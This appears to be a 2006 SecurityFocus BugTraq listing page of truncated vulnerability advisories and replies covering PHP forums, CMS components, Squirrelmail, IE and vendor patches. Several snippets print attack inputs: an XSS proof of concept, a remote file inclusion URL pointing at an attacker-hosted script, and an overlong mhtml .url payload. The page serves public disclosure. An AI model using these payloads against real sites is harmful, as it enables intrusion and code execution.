SecurityFocus

SMF 1.0.7 and lower plus 1.1rc2 and lower - IP spoofing vulnerability/IP ban evasion vulnerability 2006-06-01
Jessica Hope (jessicasaulhope googlemail com)

======================================================================

Advisory : SMF 1.0.7 and lower plus 1.1rc2 and lower - IP spoofing
vulnerability/IP ban evasion vulnerability
Release Date : June 02, 2006
Application : SMF
Version : SMF 1.0.7 and previous versions, SMF1.1rc2 and lower
Platform

[ more ] [ reply ]

Re: PHPSimple Choose v0.3 2006-06-01
prattmic gmail com

PHPSimpleChoose 0.3.1 has been released. This fixes the problem.

[ more ] [ reply ]

Joomla/Mambo CMS Component SimpleBoard 1.1 XSS-Vulnerabilities 2006-06-01
Yannick von Arx (yannick vonarx yanux ch)

Joomla/Mambo CMS Component SimpleBoard 1.1.0 Stable XSS-Vulnerabilities
=======================================================================

Release Date
------------
June 01, 2006

Vendor
-------
Two Shoes Mambo Factory
http://www.tsmf.net/

Version
-------
SimpleBoard 1.1.0 Stable (com_simpleb

[ more ] [ reply ]

Forensic memory dumping intricacies - PhysicalMemory, DD, and caching issues 2006-06-01
Arne Vidstrom (arne vidstrom ntsecurity nu)

Summary:

Memory dumping tools that use the PhysicalMemory device in Windows XP
can be blocked by allocating memory buffers with special memory types.
In older versions of Windows the tools instead could possibly cause
cache incoherence with some processor types, or other adverse side
effects. T

[ more ] [ reply ]

CA Forum Remote SQL Injection 2006-06-01
omnipresent email it

------------------------------------------------------------------

- CAForum 1.0 Remote SQL Injection -

-= http://colander.altervista.org/advisory/CAForum.txt =-

------------------------------------------------------------------

-= CodeAvalanche Forum Version 1.0 =-

[ more ] [ reply ]

[ MDKSA-2006:094 ] - Updated evolution packages fix DoS (crash) vulnerability on certain messages. 2006-06-01
security mandriva com

Re: # MHG Security Team --- PHP NUKE All version Remote File Inc. 2006-06-01
rgod autistici org

in all mentioned files we have:

...

$phpbb_root_path = "./../";

require($phpbb_root_path . 'extension.inc');

...

so I would like to see how this can work...

[ more ] [ reply ]

Corsaire Security Advisory - VMware ESX Server Cross Site Scripting issue 2006-06-01
advisories (advisories corsaire com)

-- Corsaire Security Advisory --

Title: VMware ESX Server Cross Site Scripting issue
Date: 14.11.05
Application: VMware ESX prior to 2.5.2 upgrade patch 2
VMware ESX prior to 2.1.2 upgrade patch 6
VMware ESX prior to 2.0.1 upgrade patch 6
Environment: VMware ESX
Author: S

[ more ] [ reply ]

[SECURITY] [DSA 1085-1] New lynx-cur packages fix several vulnerabilities 2006-06-01
joey infodrom org (Martin Schulze)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1085-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 1st, 2006

[ more ] [ reply ]

SyScan'06 - The Hackers' Conference in Asia 2006-06-01
thomas48 (thomas48 singnet com sg)

Dear all

SyScan'06 - The Hackers' Conference, will be held in Singapore from 20th
to 21st July 2006. This is the third year running for SyScan.

SyScan?06 Day 1 ? 20th July 2006

8:00 a.m. Registration
8:40 a.m. Welcome Speech - Thomas Lim
8:45 am Marc Maiffret ? Chief Hacking Officer, eEye - Keyn

[ more ] [ reply ]

Squirrelmail local file inclusion 2006-06-01
brokejunker yahoo com

Squirrelmail local file inclusion bug in functions/plugin.php .

Tested on the latest 1.4.x version.

No authentication needed.

if (isset($plugins) && is_array($plugins)) {

foreach ($plugins as $name) {

use_plugin($name);

}

...

function use_plugin ($name) {

if (file_exis

[ more ] [ reply ]

Snort HTTP Inspect Pre-Processor Uricontent Bypass 2006-06-01
Christian Swartzbaugh (feofil gmail com)

For those of you using snort on this list, this got posted to some of
the snort mailing lists this morning.

http://www.demarc.com/support/downloads/patch_20060531
http://www.osvdb.org/25837

"The evasion technique allows an attack to bypass detection of
"uricontent" rules by
adding a carriage retu

[ more ] [ reply ]

TAL RateMyPic v1.0 2006-06-01
luny youfucktard com

TAL RateMyPic v1.0

Homepage:

http://www.dominioseuropa.com/index.php

Effected files:

index.php

input boxes

XSS proof of concept:

By putting the following in the name, email, or comment boxes:

<IMG SRC=javascript:alert('XSS')>

And By URL Injection:

http://www.example.com/index

[ more ] [ reply ]

ishopcart cgi 0day and multiple vulnerabilities 2006-05-31
bugtraq fbi gov

Vendor: ishopcart inc
Vendor Site: ishopcart.com
Vendor Status: notified via telephone

While spending a night auditing I have found 2 buffer overflows and 1
directory traversal in the ishopcart cgi, which is written in C.

The directory traversal is caused by how the cgi chooses to show pages.
If,

[ more ] [ reply ]

multiple file inclusion exploits in ovidentia v5.8.0 2006-05-31
black-cod3 hotmail com

multiple file inclusion exploits in ovidentia v5.8.0

forum type : ovidentia v5.8.0

bug found by : black-code&sweet-devil

team : site-down

type : file include

####################################################

exploits :

http://www.example.com/orid/index.php?babInstallPath=http://Yo

[ more ] [ reply ]

FreeBSD Security Advisory FreeBSD-SA-06:15.ypserv 2006-05-31
FreeBSD Security Advisories (security-advisories freebsd org)

FreeBSD Security Advisory FreeBSD-SA-06:16.smbfs 2006-05-31
FreeBSD Security Advisories (security-advisories freebsd org)

multiple file inclusion exploits in ovidentia v5.8.0 2006-05-31
black code (black-cod3 hotmail com)

multiple file inclusion exploits in ovidentia v5.8.0

forum type : ovidentia v5.8.0
bug found by : black-code&sweet-devil
team : site-down
type : file include

####################################################
exploits :

http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com
/r

[ more ] [ reply ]

[security bulletin] HPSBUX02122 SSRT061158 rev.1 - HP-UX Mozilla Remote Execution of Arbitrary Code, Denial of Service (DoS) 2006-05-31
security-alert hp com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00679472
Version: 1

HPSBUX02122 SSRT061158 rev.1 - HP-UX Mozilla Remote Execution of Arbitrary Code,
Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted up

[ more ] [ reply ]

[SECURITY] [DSA 1084-1] New typespeed packages fix arbitrary code execution 2006-05-31
skx debian org (Steve Kemp)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1084-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Steve Kemp
May 31st, 2006

[ more ] [ reply ]

Internet explorer Vulnerbility 2006-05-31
Mr Niega gmail com (2 replies)

------------------------------Niega.url-------------------------------

[DEFAULT]

BASEURL=

[InternetShortcut]

URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[ more ] [ reply ]

RE: Internet explorer Vulnerbility 2006-06-01
Peter Kruse (kruse krusesecurity dk)

Re: Internet explorer Vulnerbility 2006-06-01
Alexander Sotirov (asotirov determina com)

SUSE Security Announcement: rug (SUSE-SA:2006:029) 2006-05-31
Thomas Biege (thomas suse de)

rPSA-2006-0087-1 kernel 2006-05-31
Justin M. Forbes (jmforbes rpath com)

rPath Security Advisory: 2006-0087-1
Published: 2006-05-31
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local Non-deterministic Information Exposure
Updated Versions:
kernel=/conary.rpath.com@rpl:devel//1/2.6.16.19-1-0.1

References:
http://www.cve.mitre.org/cgi-b

[ more ] [ reply ]

Re: Fire fox dos exploit 2006-05-31
anoni mouse gmail com

Here's the bug on bugzilla:

https://bugzilla.mozilla.org/show_bug.cgi?id=239840

It seems this bug has been around for quite a while...

[ more ] [ reply ]

New SecurityFocus mailing list: Focus-Apple 2006-05-31
Marc Fossi (mfossi securityfocus com) (1 replies)

Objective

The Focus-Apple mailing list discusses security involving hardware and software
produced by Apple or that runs on Apple platforms. Discussion may include
security assessment, planning, and implementation for Apple technologies. This
list is meant as an aid to network and systems admin

[ more ] [ reply ]

Re: New SecurityFocus mailing list: Focus-Apple 2006-05-31
Marc Fossi (mfossi securityfocus com)

Secunia Research: ZipCentral ZIP File Handling Buffer OverflowVulnerability 2006-05-31
Secunia Research (remove-vuln secunia com)

======================================================================

Secunia Research 30/05/2006

- ZipCentral ZIP File Handling Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software...

[ more ] [ reply ]

Secunia Research: Eserv/3 IMAP and HTTP Server MultipleVulnerabilities 2006-05-31
Secunia Research (remove-vuln secunia com)

======================================================================

Secunia Research 31/05/2006

- Eserv/3 IMAP and HTTP Server Multiple Vulnerabilities -

======================================================================
Table of Contents

Affected Software.....

[ more ] [ reply ]